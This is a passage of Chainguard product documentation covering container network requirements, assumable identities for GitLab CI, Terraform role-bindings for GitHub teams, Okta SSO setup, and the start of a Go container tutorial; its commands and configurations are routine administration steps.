stanza with license, version, and source code references is shown here: { "SPDXID": "SPDXRef-Package-glibc-locale-posix-2.39-r6", "externalRefs": [ { "referenceCategory": "PACKAGE_MANAGER", "referenceLocator": "pkg:apk/wolfi/glibc-locale-posix@2.39-r6?arch=x86_64", "referenceType": "purl" }, { "referenceCategory": "PACKAGE_MANAGER", "referenceLocator": "pkg:generic/glibc@2.39?checksum=sha256%3Af77bd47cf8170c57365ae7bf86696c118adb3b120d3259c64c502d3dc1e2d926&download_url=http%3A%2F%2Fftp.gnu.org%2Fgnu%2Flibc%2Fglibc-2.39.tar.xz", "referenceType": "purl" }, { "referenceCategory": "PACKAGE_MANAGER", "referenceLocator": "pkg:github/wolfi-dev/os@f18ff825f94b9177cf603c6e3d72936683a504d2#glibc.yaml", "referenceType": "purl" } ], "licenseDeclared": "LGPL-2.1-or-later", "name": "glibc-locale-posix", "originator": "Organization: Wolfi", "supplier": "Organization: Wolfi", "versionInfo": "2.39-r6" } This snippet shows that the glibc-locale-posix binary package is distributed under LGPL license, built from the glibc-2.39.tar.xz upstream tarball, using the glibc.yaml file from the wolfi-dev/os repository. Learn more We provide provenance information for every Chainguard Container in their respective details pages. After reaching the Overview for the image of your choice, navigate to the Provenance tab for information on how to retrieve the image’s attestations, as well as how to verify the image’s attestations and signatures. For example, if you’re looking for the provenance information of the Python image, you can navigate to the Python provenance information page. --- ### Chainguard Containers Network Requirements URL: https://edu.chainguard.dev/chainguard/chainguard-images/network-requirements/ Last Modified: June 17, 2025 Tags: Product, Reference This document provides an overview of network requirements for using Chainguard Containers. To use Chainguard tools and Containers in environments with firewalls, VPNs, and IDS/IPS systems, you will need to add some rules to allow traffic into and out of your networks. Chainguard Containers do not call Chainguard services while running, so no network changes would be required to the runtime environment. Review the Notes column for more info on each Hostname. Chainguard Containers Hosts This table lists the DNS hostnames, associated ports, and protocols that will need to be allowed through firewalls and proxies to use Chainguard Containers: Hostname Port Protocol Notes cgr.dev 443 HTTPS Main container image registry console.chainguard.dev 443 HTTPS Chainguard dashboard data.chainguard.dev 443 HTTPS Console API endpoint console-api.enforce.dev 443 HTTPS Registry API endpoint enforce.dev 443 HTTPS Registry authentication dl.enforce.dev 443 HTTPS chainctl downloads issuer.enforce.dev 443 HTTPS Registry STS (Security Token Service) apk.cgr.dev 443 HTTPS Package repository virtualapk.cgr.dev 443 HTTPS Package repository packages.cgr.dev 443 HTTPS Package repository (Extra packages) packages.wolfi.dev 443 HTTPS Package repository (Starter containers) If you experience networking issues while trying to use Chainguard Containers, please ensure that your firewall allows traffic to and from these hosts, and that it doesn’t have any rules to block .dev domains. Chainguard Containers Third-party Hosts This table lists the third-party DNS hostnames, associated ports, and protocols that will need to be allowed through firewalls and proxies to use Chainguard Containers: Hostname Port Protocol Notes 9236a389bd48b984df91adc1bc924620.r2.cloudflarestorage.com 443 HTTPS Blob storage for cgr.dev support.chainguard.dev 443 HTTPS Support access for customers Ingress and Egress Connections to the hosts listed on this page are generally initiated as new outbound connections. If you are using stateful firewall rules, then you will need to add symmetric rules to ensure that traffic flows correctly. You will need egress rules that allow new traffic to the hosts listed here. You will need corresponding ingress rules that allow related and established traffic. DNS Records and TTLs Many of the hosts listed on this page use multiple DNS A records or CNAME aliases. Additionally, many A records have a short time to live of 60 seconds, and the majority are less than an hour (3600s). If your network filters traffic based on IP addresses, ensure that any firewalls update their rules at an appropriate interval to match the TTL for each DNS record. --- ### Create an Assumable Identity for a GitLab CI/CD Pipeline URL: https://edu.chainguard.dev/chainguard/administration/assumable-ids/identity-examples/gitlab-identity/ Last Modified: June 14, 2025 Tags: Chainguard Containers, Product, Procedural Chainguard’s assumable identities are identities that can be assumed by external applications or workflows in order to perform certain tasks that would otherwise have to be done by a human. This procedural tutorial outlines two methods for how to create a Chainguard identity: chainctl and Terraform. It then walks through how to create a GitLab CI/CD pipeline that will assume the identity to interact with Chainguard resources. Prerequisites To complete this guide, you will need the following. Both methods outlined in this guide require you to have the following: Access to a GitLab project and CI/CD pipeline you can use to test out the identity you’ll create. GitLab provides a quickstart tutorial on creating your first pipeline which can be useful for getting a testing pipeline up and running. chainctl — the Chainguard command line interface tool — installed on your local machine. Follow our guide on How to Install chainctl to set this up. Additionally, the Terraform method requires you to have terraform installed on your local machine. Terraform is an open-source Infrastructure as Code tool which this guide will use to create various cloud resources. Follow the official Terraform documentation for instructions on installing the tool. Create an Assumable Identity with chainctl You can create a new Chainguard identity that a GitLab CI/CD pipeline can assume by running the following command. Be sure to replace <organization> with the name of the Chainguard organization you want this identity to be used for. You’ll also need to replace <group_name> and <project_name> with your actual GitLab group and project names. For example, if your GitLab project URL is https://gitlab.com/mycompany/myproject, then: <group_name> should be mycompany <project_name> should be myproject chainctl iam identities create cg-gitlab-id \ --parent=<organization> \ --identity-issuer="https://gitlab.com" \ --subject="project_path:<group_name>/<project_name>:ref_type:branch:ref:main" \ --audience="https://gitlab.com" \ --role=viewer Take note of the identity’s full UIDP (unique identity path) as you’ll need it to test this identity out in a GitLab CI/CD configuration. This command creates an identity named cg-gitlab-id with the following claim matching rules: Issuer: https://gitlab.com (GitLab’s OIDC token issuer) Subject: Restricts access to a specific GitLab project running on the main branch Audience: https://gitlab.com (the intended recipient of the token) These options’ values are string literals; you can use --identity-issuer-pattern, --subject-pattern, and --audience-pattern to use regular expressions instead. This command also binds the viewer role to the new identity. The viewer role provides read-only access to Chainguard resources, which is appropriate for most CI/CD use cases that need to pull images or inspect resources. You can also chain together multiple roles, as in --role=registry.push,registry.pull. To see all available roles and their permissions, run chainctl iam roles list. You can also learn more by reviewing our Overview of Roles and Role-bindings in Chainguard. If you ever need to retrieve information about it in the future, you can run the following command: chainctl iam identities ls This will return cg-gitlab-id listed among all your Chainguard identities. With that, you can jump ahead to testing the new identity. You can also continue onto the next section and learn how to create another such identity with Terraform. Create an Assumable Identity with Terraform This section outlines how to use Terraform to create an identity for a GitLab pipeline to assume. This involves creating two Terraform configuration files that, together, will produce such an identity. To help explain each configuration file’s purpose, we will go over what they do and how to create each file one by one. First, though, create a directory to hold the Terraform configuration and navigate into it. mkdir ~/gitlab-tf && cd $_ This will help make it easier to clean up your system at the end of this guide. main.tf The first file, which we will call main.tf, will serve as the scaffolding for our Terraform infrastructure. The file will consist of the following content. terraform { required_providers { chainguard = { source = "chainguard-dev/chainguard" } } } This is a fairly barebones Terraform configuration file, but we will define the rest of the resources in the other two files. In main.tf, we declare and initialize the Chainguard Terraform provider. gitlab.tf The gitlab.tf file is what will actually create the identity for your GitLab CI pipeline workflow to assume. The file will consist of five sections, which we’ll go over one by one. The first section section looks up a Chainguard IAM organization named myorg.biz: data "chainguard_group" "group" { name = "myorg.biz" } Be sure to change myorg.biz to the name of your own Chainguard organization. The next section creates the identity itself. resource "chainguard_identity" "gitlab" { parent_id = data.chainguard_group.group.id name = "gitlab-ci" description = <<EOF This is an identity that authorizes Gitlab CI in this repository to assume to interact with chainctl. EOF claim_match { issuer = "https://gitlab.com" subject = "project_path:<group_name>/<project_name>:ref_type:branch:ref:main" audience = "https://gitlab.com" } } First this section creates a Chainguard Identity tied to the chainguard_group looked up in the sample.tf file. The identity is named gitlab-ci and has a brief description. The most important part of this section is the claim_match. When the GitLab pipeline tries to assume this identity later on, it must present a token matching the issuer, subject, and audience specified here in order to do so. The issuer is the entity that creates the token, the subject is the entity that the token represents (here, the GitLab pipeline), and the audience is the intended recipient of the token. In this case, the issuer field points to https://gitlab.com, the issuer of JWT tokens for GitLab pipelines. Likewise, the audience field also points to https://gitlab.com. This will work for demonstration purposes, but if you’re taking advantage of GitLab’s support for custom audiences then be sure to change this to the appropriate audience. These values are string literals; you can use identity-issuer-pattern, subject-pattern, and audience-pattern to use regular expressions instead. The GitLab documentation provides several examples of subject claims which you can refer to if you want to construct a subject claim specific to your needs. For the purposes of this guide, though, you will need to replace <group_name> and <project_name> with the name of your GitLab group and project names, respectively. The next section will output the new identity’s id value. This is a unique value that represents the identity itself. output "gitlab-identity" { value = chainguard_identity.gitlab.id } The section after that looks up the viewer role. data "chainguard_role" "viewer" { name = "viewer" } The final section grants this role to the identity. resource "chainguard_rolebinding" "view-stuff" { identity = chainguard_identity.gitlab.id group = data.chainguard_group.group.id role = data.chainguard_role.viewer.items[0].id } Following that, your Terraform configuration will be ready. Now you can run a few terraform commands to create the resources defined in your .tf files. Creating Your Resources First, run terraform init to initialize Terraform’s working directory. terraform init Then run terraform plan. This will produce a speculative execution plan that outlines what steps Terraform will take to create the resources defined in the files you set up in the last section. terraform plan Then apply the configuration. terraform apply Before going through with applying the Terraform configuration, this command will prompt you to confirm that you want it to do so. Enter yes to apply the configuration. ... Plan: 4 to add, 0 to change, 0 to destroy. Changes to Outputs: + gitlab-identity = (known after apply) Do you want to perform these actions? Terraform will perform the actions described above. Only 'yes' will be accepted to approve. Enter a value: After typing yes and pressing ENTER, the command will complete and will output a gitlab-ci value. ... Apply complete! Resources: 4 added, 0 changed, 0 destroyed. Outputs: gitlab-identity = "<your actions identity>" This is the identity’s UIDP (unique identity path), which you configured the gitlab.tf file to emit in the previous section. Note this value down, as you’ll need it to set up the GitLab CI pipeline you’ll use to test the identity. If you need to retrieve this UIDP later on, though, you can always run the following chainctl command to obtain a list of the UIDPs of all your existing identities. chainctl iam identities ls Note that you may receive a PermissionDenied error part way through the apply step. If so, run chainctl auth login once more, and then terraform apply again to resume creating the identity and resources. You’re now ready to create a GitLab CI pipeline which you’ll use to test out this identity. Testing the identity with a GitLab CI/CD Pipeline From the GitLab Dashboard, select Projects in the left-hand sidebar menu. From there, click on the project you specified in the subject claim to be taken to the project overview. In the list of the repository’s contents, there will be a file named .gitlab-ci.yml. This is a special file that’s required when using GitLab CI/CD, as it contains the CI/CD configuration. Click on the .gitlab-ci.yml file, then click the Edit button and select an option for editing the file. For the purpose of this guide, delete whatever content is in this file to start and replace it with the following. image: cgr.dev/chainguard/wolfi-base stages: - assume-and-explore assume-and-explore: id_tokens: ID_TOKEN_1: aud: https://gitlab.com stage: assume-and-explore script: - | # Install wget apk add wget # Install chainctl. wget -O chainctl "https://dl.enforce.dev/chainctl/latest/chainctl_linux_$(uname -m)" chmod +x chainctl mv chainctl /usr/bin # Assume the identity. chainctl auth login \ --identity-token $ID_TOKEN_1 \ --identity <your gitlab identity> chainctl auth configure-docker \ --identity-token $ID_TOKEN_1 \ --identity <your gitlab identity> # Explore available images. chainctl images repos list Let’s go over what this configuration does. First, GitLab requires that pipelines have a shell. To this end, this configuration uses the cgr.dev/chainguard/wolfi-base image since it includes the sh shell. Next, this configuration creates a JSON Web Token (JWT) with an id_tokens block that will allow the job to be able to fetch an OIDC token and authenticate with Chainguard. GitLab requires that any JWTs created in this manner must include an aud keyword. In this case, it should align with the audience associated with the Chainguard identity you created: https://gitlab.com. Following that, the job runs a few commands to download and install chainctl. It then uses chainctl, the JWT, and the Chainguard identity’s id value to assume the Chainguard identity and log in. Note: Be sure to replace <your gitlab identity> with the identity UIDP you noted down in the previous section. After logging in, the pipeline is able to run any chainctl command under the assumed identity. To test out this ability, this configuration runs the chainctl images repos list command to list all available image repos associated with the organization. After updating the configuration, commit the changes and the pipeline will run automatically. A status box in the dashboard will let you know whether the pipeline runs successfully. Click Build and then Pipelines to view the pipeline, and then click the assume-and-explore job button to open the job’s output from the last run. There you should see a list of container repositories accessible to your organization: . . . Successfully exchanged token. Valid! Id: $ORGANIZATION/$IDENTITY Updated auth config for cgr.dev [cgr.dev/example.edu] ├ [buildkit] ├ [mongodb] ├ [nginx] ├ [node] ├ [postgresql] └ [python] This indicates that the GitLab CI/CD pipeline did indeed assume the identity and run the chainctl images repos list command. Next Steps If you’d like to experiment further with this identity and what the workflow can do with it, there are a few parts of this setup that you can tweak. For instance, if you’d like to give this identity different permissions you can change the role data source to the role you would like to grant. data "chainguard_roles" "editor" { name = "editor" } To retrieve a list of all the available roles — including any custom roles — you can run the following command. chainctl iam roles list You can also edit the pipeline itself to change its behavior. For example, instead of inspecting the image repos the identity has access to, you could have the workflow inspect the organization like in the following example. chainctl iam orgs ls The GitLab pipeline will only be able to perform certain actions on certain resources, depending on what kind of access you grant it. Removing Sample Resources To delete the identity created directly with chainctl, run the following: chainctl iam identities delete cg-gitlab-id This will also remove the identity’s role-binding. To remove the resources Terraform created, you can run the terraform destroy command. terraform destroy This will destroy identity and the role-binding created in this guide. It will not delete the organization. You can then remove the working directory to clean up your system. rm -r ~/gitlab-tf/ Following that, all of the example resources created in this guide’s Terraform instructions will be removed from your system. Learn more For more information about how assumable identities work in Chainguard, check out our conceptual overview of assumable identities. Additionally, the Terraform documentation includes a section on recommended best practices which you can refer to if you’d like to build on this Terraform configuration for a production environment. Likewise, for more information on using GitLab CI/CD pipelines, we encourage you to check out the official documentation on the subject. --- ### Create Role-bindings for a GitHub Team Using Terraform URL: https://edu.chainguard.dev/chainguard/administration/iam-organizations/roles-role-bindings/rolebinding-terraform-gh/ Last Modified: May 9, 2024 Tags: Product, Procedural There may be cases where an organization will want multiple users to have access to the same Chainguard organization. Chainguard allows you to grant other users access to Chainguard by generating an invite link or code. In addition, you can now grant access to users using Terraform and identity providers like GitHub, GitLab, and Google. You can also manage access through these providers’ existing group structures, like GitHub Teams or GitLab Groups. Granting access through Terraform helps to reduce the risk of unwanted users gaining access to Chainguard. This guide outlines one method of using Terraform to grant members of a GitHub team access to the resources managed by a Chainguard organization. It also highlights a few other Terraform configurations you can use to manage role-bindings in the Chainguard platform. Although this guide is specific to GitHub, the same approach can be used for other systems. Prerequisites To complete this guide, you will need the following. terraform installed on your local machine. Terraform is an open-source Infrastructure as Code tool which this guide will use to create various cloud resources. Follow the official Terraform documentation for instructions on installing the tool. chainctl — the Chainguard command line interface tool — installed on your local machine. Follow our guide on How to Install chainctl to set this up. Access to a GitHub team. If you’d like, you can create a new GitHub organization and team for testing purposes. Check out GitHub’s documentation for details on how to do this. A GitHub Personal Access Token, with a minimum of read.org access. Follow GitHub’s documentation on the subject to learn how to set one up. Additionally, you will need to configure SSO for your personal access token if required by your organization. Setting up your Environment There are a few things you must have in place in order to follow this guide. First, create a testing directory to hold the Terraform configuration and navigate into it. mkdir ~/github-team && cd $_ This will help make it easier to clean up your system at the end of this guide. Next, you’ll need to set up a few environment variables that the Terraform configuration in this guide assumes you will have in place. Start by creating an environment variable named GITHUB_ORG that points to the name of your GitHub organization. Run the following command to create this variable, but be sure to replace <your GitHub organization> with actual name of your organization as it appears in URLs. For example, if your organization owns a repository at the URL htttps://github.com/orgName-example/repository-name, then the value you would pass here would be orgName-example. export GITHUB_ORG=<your GitHub organization> Next, create a variable named GITHUB_TEAM set to the slug of the GitHub team for which you want to create a set of role-bindings. The Terraform configuration will use this detail to find and retrieve information about your GitHub team. If you aren’t sure of what your team’s slug is, you can find it with gh, the GitHub command line interface. You can use a command like the following to retrieve a list of all your organization’s teams. gh api -H "Accept: application/vnd.github+json" -H "X-GitHub-Api-Version: 2022-11-28" /orgs/$GITHUB_ORG/teams Scroll through this command’s output to find the slug value for the team in question. [ . . . { "name": "Team Name", "id": 9999999, "node_id": "T_kwDOBTYtm84AbTQX", "slug": "team-slug", . . . }, . . . ] With the team’s slug in hand, run the following command to create the GITHUB_TEAM environment variable. export GITHUB_TEAM=<your GitHub team slug> Following that, you will need to provide Terraform with your GitHub personal access token so it can access information related to your GitHub organization. Rather than hard coding your token into the Terraform configuration or having Terraform prompt you to enter it manually, you can create an environment variable named GITHUB_TOKEN which Terraform will automatically use. Create this variable with the following command. export GITHUB_TOKEN=<your GitHub token> Lastly, the Chainguard role-bindings that this guide’s Terraform configuration will create must all be tied to an organization. Create another variable named CHAINGUARD_ORG with the following command, replacing <UIDP of target Chainguard IAM organization> with the UIDP of the Chainguard IAM organization you want to tie the role-bindings to. You can find the UIDP for your Chainguard IAM organization by running chainctl iam organizations ls -o table. export CHAINGUARD_ORG="<UIDP of target Chainguard IAM organization>" Following that, you will have everything you need in place to set up the Terraform configuration. Creating your Terraform Configuration As mentioned previously, we will be using Terraform to create role-bindings for each user in a GitHub team, giving them access to resources associated with a given Chainguard organization. This guide outlines how to create two Terraform configuration files that, together, will produce a set of such role-bindings. To help explain both files’ purposes, we will go over what they do and how to create each one individually. main.tf First, we will create a main.tf file which will set up the necessary Terraform providers. This file will consist of the following lines. terraform { required_providers { chainguard = { source = "chainguard-dev/chainguard" } github = { source = "integrations/github" } } } provider "github" { owner = "$GITHUB_ORG" } The terraform block defines the sources for the chainguard and github providers. The provider block sets up the github provider with one argument — owner — that points to the GITHUB_ORG variable you set previously. Create the main.tf file with the following command. cat <<EOF > main.tf terraform { required_providers { chainguard = { source = "chainguard-dev/chainguard" } github = { source = "integrations/github" } } } provider "github" { owner = "$GITHUB_ORG" } EOF Next, you will create the other configuration file that will actually create the role-bindings for your GitHub team. rolebindings.tf The rolebindings.tf file will contain a few separate blocks that retrieve information about the GitHub team members and create Chainguard role-bindings for each one. The first block creates a github_team data source named team. data "github_team" "team" { slug = "$GITHUB_TEAM" } Using the arguments you provided in the github provider block in main.tf, Terraform will search for any GitHub teams matching the slug specified within this block. If Terraform can find a team with a matching slug in the specified GitHub organization, then you will be able to pull more data about this team down from GitHub. After the first block retrieves information about the team, we need to retrieve information about each member of the team in order to create an identity for each of them. To this end, the next block creates a github_user data source named team_members. data "github_user" "team_members" { for_each = toset(data.github_team.team.members) username = each.key } Because, we want this source to represent every member of the team, this block starts with a for_each meta-argument which accepts a toset map of the GitHub team members derived from the github_team source created previously. Additionally, the github_user data source requires you to set the username argument to whichever user you want the data source to represent. In the Terraform Language, each.key is the map key corresponding to the objects referenced in the for_each argument. In this case, it means the username variable will be tied to a mapping of each member of the GitHub team within this Terraform configuration. The next block retrieves Chainguard identities for each member of the GitHub team. data "chainguard_identity" "team_ids" { for_each = toset([for x in data.github_user.team_members : x.id]) issuer = "https://auth.chainguard.dev/" subject = "github|${each.key}" } This block’s for_each meta-argument iterates through each member of the team. For each iteration, it retrieves that user’s GitHub ID and then retrieves a Chainguard identity that it derives using that GitHub ID. If there are members of the GitHub team who have not yet registered with Chainguard, this method will still assign them the correct permissions when they log in for the first time. The next block retrieves the predefined viewer role from Chainguard. data "chainguard_role" "viewer" { name = "viewer" } The final block puts all this information together to create the role-bindings for each member of the team. resource "chainguard_rolebinding" "cg-binding" { for_each = data.chainguard_identity.team_ids identity = each.value.id group = "$CHAINGUARD_ORG" role = data.chainguard_role.viewer.items[0].id } This resource block iterates through the list of Chainguard identities, assigns each one to the IAM organization specified by the group argument, and binds each identity to the viewer role. Here, the group argument is set to the CHAINGUARD_ORG variable you created at the start of this guide. Create the rolebindings.tf file with the following command. cat <<EOF > rolebindings.tf data "github_team" "team" { slug = "$GITHUB_TEAM" } data "github_user" "team_members" { for_each = toset(data.github_team.team.members) username = each.key } data "chainguard_identity" "team_ids" { for_each = toset([for x in data.github_user.team_members : x.id]) issuer = "https://auth.chainguard.dev/" subject = "github|\${each.key}" } data "chainguard_role" "viewer" { name = "viewer" } resource "chainguard_rolebinding" "cg-binding" { for_each = data.chainguard_identity.team_ids identity = each.value.id group = "$CHAINGUARD_ORG" role = data.chainguard_role.viewer.items[0].id } EOF Note that the fourteenth line of this file contains a backslash (\). subject = "github|\${each.key}" This is an escape character which will prevent the dollar sign in that line from causing a bad substitution error. Now that your Terraform configuration is in place, you’re ready to apply it and create role-bindings for each member of your GitHub team. Applying your Terraform Configuration First, run terraform init to initialize Terraform’s working directory. terraform init Then run terraform plan. This will produce a speculative execution plan that outlines what steps Terraform will take to create the resources defined in the files you set up in the last section. terraform plan If the plan worked successfully and you’re satisfied that it will produce the resources you expect, you can apply it. terraform apply Before going through with applying the Terraform configuration, this command will prompt you to confirm that you want it to do so. Enter yes to apply the configuration. . . . Plan: 2 to add, 0 to change, 0 to destroy. Do you want to perform these actions? Terraform will perform the actions described above. Only 'yes' will be accepted to approve. Enter a value: After pressing ENTER, the command will complete. . . . Apply complete! Resources: 2 added, 0 changed, 0 destroyed. Following this, any members of your GitHub team for whom you’ve created role-bindings will be able to view the resources associated with the Chainguard organization you specified. To do so, they need to log in to the Chainguard platform, either by logging into the Chainguard Console or with the following command. chainctl auth login After navigating to the Console or running the login command, they will be presented with the following login flow. There, they must click the Continue with GitHub button to continue logging in under their GitHub account. Chainguard will immediately recognize their GitHub account because it is tied to the role-binding you created in the previous step, and they will be able to view the resources associated with the Chainguard organization specified in your Terraform configuration. Optional Configurations The Terraform configuration used in this guide is meant to serve as a starting point, and we encourage you to tweak and expand on it to suit your organization’s needs. This section contains a few alternative configurations that you may find useful. For example, rather than applying the viewer role to your team’s role-bindings, you can apply one of the other built-in roles, or any custom roles created within your Chainguard organization. The following data and resource block examples could be used in place of the ones used in this guide’s rolebindings.tf file. Instead of granting the identities the viewer role, this grants them the editor role. data "chainguard_roles" "editor" { name = "editor" } resource "chainguard_rolebinding" "cg-binding" { for_each = toset(data.chainguard_identity.team_ids) identity = each.value.id group = "$CHAINGUARD_ORG" role = data.chainguard_roles.editor.items[0].id } The Terraform configuration language is quite flexible. You can update your Terraform configuration to retrieve information about a single user, rather than an entire team. data "github_user" "user" { username = "$USERNAME" } Likewise, you can retrieve a GitHub user’s Chainguard identity without having to include the for_each meta-argument. data "chainguard_identity" "gh-user-chainguard-rb" { issuer = "https://auth.chainguard.dev/" subject = "github|${data.github_user.$USERNAME.id}" } You can refer to the Terraform language documentation for more information on extending the configuration outlined in this guide to suit your own needs. Removing Sample Resources To remove the resources Terraform created, you can run the terraform destroy command. terraform destroy This will destroy the Chainguard role-bindings created for your GitHub team. You can then remove the working directory to clean up your system. rm -r ~/github-team/ Following that, all of the example resources created in this guide will be removed from your system. Learn More The procedure outlined in this tutorial can be tweaked to work with other identity providers, including Google and GitLab. --- ### How To Integrate Okta SSO with Chainguard URL: https://edu.chainguard.dev/chainguard/administration/custom-idps/idp-providers/okta/ Last Modified: October 28, 2024 Tags: Chainguard Containers, Procedural The Chainguard platform supports Single sign-on (SSO) authentication for users. By default, users can log in with GitHub, GitLab and Google, but SSO support allows users to bring their own identity provider for authentication. This guide outlines how to create an Okta application and integrate it with Chainguard. After completing this guide, you’ll be able to log in to Chainguard using Okta and will no longer be limited to the default SSO options. Prerequisites To complete this guide, you will need the following. chainctl installed on your system. Follow our guide on How To Install chainctl if you don’t already have this installed. An Okta account over which you have administrative access. Create an Okta App integration To integrate your Okta identity provider with the Chainguard platform, log in to Okta and navigate to the Applications landing page in the Admin console. There, click the Create App Integration button. Select OIDC - OpenID Connect as the sign-in method and Web Application as the application type. Next, in the General Settings window, configure the application as follows. App integration name: Enter a descriptive name (like “Chainguard”) here. Logo: You can optionally add a Chainguard logo icon here to help your users visually identify this integration. If you’d like, you can use the icon from the Chainguard Console. Grant type: Ensure that the grant type is set to Authorization Code only. Warning: DO NOT select other grant types as this may compromise your security. Sign-in redirect URIs: Set the redirect URI to https://issuer.enforce.dev/oauth/callback Sign-out redirect URIs: This will have a URI field set to http://localhost:8080 by default. Click the X icon to remove the sign-out redirect entirely, leaving this field blank. Click the Save button. Then, select the Sign On tab. Find the OpenID Connect ID Token section and click the Edit button. Set the Issuer option to Okta URL, then click the Save button. That completes our configuration of the Okta Application. Next, we need to configure the Chainguard platform to use our Okta application. Configuring Chainguard to use Okta SSO Now that your Okta application is ready, you can create the custom identity provider. First, log in to Chainguard with chainctl, using an OIDC provider like Google, GitHub, or GitLab to bootstrap your account. chainctl auth login Note that this bootstrap account can be used as a backup account (that is, a backup account you can use to log in if you ever lose access to your primary account). However, if you prefer to remove this role-binding after configuring the custom IDP, you may also do so. To configure the platform, make a note of the following settings from your Okta Application: Client ID: You can find this on the General tab under Client Credentials Client Secret: Find this on the General Tab under Client Credentials Issuer URL: This is found under the Sign on tab in the OpenID Connect ID Token section You will also need the UIDP for the Chainguard organization under which you want to install the identity provider. Your selection won’t affect how your users authenticate but will have implications on who has permission to modify the SSO configuration. You can retrieve a list of all Chainguard organizations you belong to — along with their UIDPs — with the following command. chainctl iam organizations ls -o table ID | NAME | DESCRIPTION --------------------------------------------------------+-------------+--------------------- 59156e77fb23e1e5ebcb1bd9c5edae471dd85c43 | sample_org | . . . | . . . | Note down the ID value for your chosen organization. With this information in hand, create a new identity provider with the following commands. export NAME=okta export CLIENT_ID=<your client id here> export CLIENT_SECRET=<your client secret here> export ISSUER=<your issuer url here> export ORG=<your organization UIDP here> chainctl iam identity-provider create \ --configuration-type=OIDC \ --oidc-client-id=${CLIENT_ID} \ --oidc-client-secret=${CLIENT_SECRET} \ --oidc-issuer=${ISSUER} \ --oidc-additional-scopes=email \ --oidc-additional-scopes=profile \ --parent=${ORG} \ --default-role=viewer \ --name=${NAME} Note the --default-role option. This defines the default role granted to users registering with this identity provider. This example specifies the viewer role, but depending on your needs you might choose editor or owner. If you don’t include this option, you’ll be prompted to specify the role interactively. For more information, refer to the IAM and Security section of our Introduction to Custom Identity Providers in Chainguard tutorial. You can refer to our Generic Integration Guide in our Introduction to Custom Identity Providers article for more information about the chainctl iam identity-provider create command and its required options. To log in to the Chainguard Console with the new identity provider you just created, navigate to console.chainguard.dev and click Use Your Identity Provider. Next, click Use Your Organization Name and enter the name of the organization associated with the new identity provider. Finally, click the Login with Provider button. This will open up a new window with the Okta login flow, allowing you to complete the login process through there. You can also use the custom identity provider to log in through chainctl. To do this, run the chainctl auth login command and add the --identity-provider option followed by the identity provider’s ID value: chainctl auth login --identity-provider <IDP-ID> The ID value appears in the ID column of the table returned by the chainctl iam identity-provider create command you ran previously. You can also retrieve this table at any time by running chainctl iam identity-provider ls -o table when logged in. --- ### Getting Started with the Go Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/go/ Last Modified: March 24, 2025 Tags: Chainguard Containers, Product The Go Chainguard Container is a container image suitable for building Go applications. The latest variant is a distroless image without a package manager, while the latest-dev variant offers additional building tools and the apk package manager. In this guide, we’ll demonstrate how to build and execute Go applications using Chainguard Containers, using three examples from our demos repository. In the first example, we’ll build a CLI application using a Docker multi-stage build. In the second example, we’ll build an application that’s accessible by HTTP server, also using a Docker multi-stage build to obtain an optimized runtime. The third example shows how to build an image using ko, a tool that enables you to build container images from Go programs and push them to container registries without requiring a Dockerfile. The examples in this guide recommend executing Go binaries from one of our runtime Chainguard Containers, such as the glibc-dynamic or static Chainguard Containers. That is possible because Go applications are compiled and the toolchain is not typically required in a runtime container image. What is distroless Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Images Chainguard Containers are a mix of distroless and development container images based on Wolfi. Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. Preparation This tutorial requires Docker to be installed on your local machine. If you don’t have Docker installed, you can download and install it from the official Docker website. The third and optional example requires the installation of ko, which you can install by following the instructions on the official site. Cloning the Demos Repository Start by cloning the demos repository to your local machine: git clone git@github.com:chainguard-dev/edu-images-demos.git Access the go folder in the repository: cd edu-images-demos/go Here you will find three folders, each with a different demo that we’ll cover in this guide. Example 1: CLI Application in Multi-Stage Build The following example demonstrates a command line application with support for flags and positional arguments. The application prints a modifiable greeting message and provides usage information if the wrong number of arguments are passed by a user or the user passes an unrecognized flag. Start by accessing the go-greeter folder in the demos repository: cd go-greeter For reference, here is the content of the Dockerfile for this demo: FROMcgr.dev/chainguard/go AS builderCOPY . /appRUN cd /app && go build -o go-greeter .FROMcgr.dev/chainguard/staticCOPY --from=builder /app/go-greeter /usr/bin/ENTRYPOINT ["/usr/bin/go-greeter"]This Dockerfile will: Start a build stage based on the go:latest container image and name it builder; Copy the application files to the /app directory in the image; Build the application in the /app directory; Start a new build stage based on the static:latest image; Copy the built application from the builder stage to the /usr/bin directory in the new image; Set the entrypoint to the built application. Run the following command to build the container image, tagging it go-greeter: docker build . --pull -t go-greeter You can now run the container image with: docker run go-greeter You should get output similar to the following: Hello, Linky 🐙! You can also pass in arguments that will be parsed by the Go CLI application: docker run go-greeter -g Greetings "Chainguard user" This will produce the following output: Greetings, Chainguard user! The application will also share usage instructions when prompted with the --help flag or when invalid flags are passed. Because we used the static Chainguard Container as our runtime, the final container image only requires a few megabytes on disk: docker inspect go-greeter | jq -c 'first' | jq .Size | numfmt --to iec --format "%8.4f" 3.3009M The final size, 3.309M, is orders of magnitude smaller than it would be running the application using a Go image. However, if your application is dynamically linked to shared objects, consider using the glibc-dynamic Chainguard Container for your runtime or take extra steps to build your Go binary statically. In the next example, we’ll build a web application and use the glibc-dynamic Chainguard Container as runtime. Example 2: Web Application The second example demonstrates an application that’s accessible by HTTP server. The application renders a simple message that changes based on the URI. Start by accessing the greet-server folder in the Go demos repository: cd greet-server For reference, here is the content of the Dockerfile for this demo: FROMcgr.dev/chainguard/go AS builderCOPY . /appRUN cd /app && go buildFROMcgr.dev/chainguard/glibc-dynamicCOPY --from=builder /app/greet-server /usr/bin/EXPOSE8080ENTRYPOINT ["/usr/bin/greet-server"]Use the following command to build the container image, tagging it greet-server: docker build . --pull -t greet-server Now you can run the container image with the following command: docker run -p 8080:8080 greet-server Visit http://0.0.0.0:8080/ using a web browser on your host machine. You should get a greeting message: Hello, Linky 🐙! Changes to the URI will be routed to the application. Try visiting http://0.0.0.0:8080/Chainguard%20Customer. You should see the following output: Hello, Chainguard Customer! The application will also share version information at http://0.0.0.0:8080/version. Example 3: Minimal Go Chainguard Container Built with ko In this example, we’ll build a distroless Go Chainguard Container with ko. ko offers fast container image builds for Go applications without requiring a Dockerfile. Additionally, ko produces SBOMs by default, supporting a holistic approach to software security. Start by accessing the go-digester folder in the Go demos repository: cd 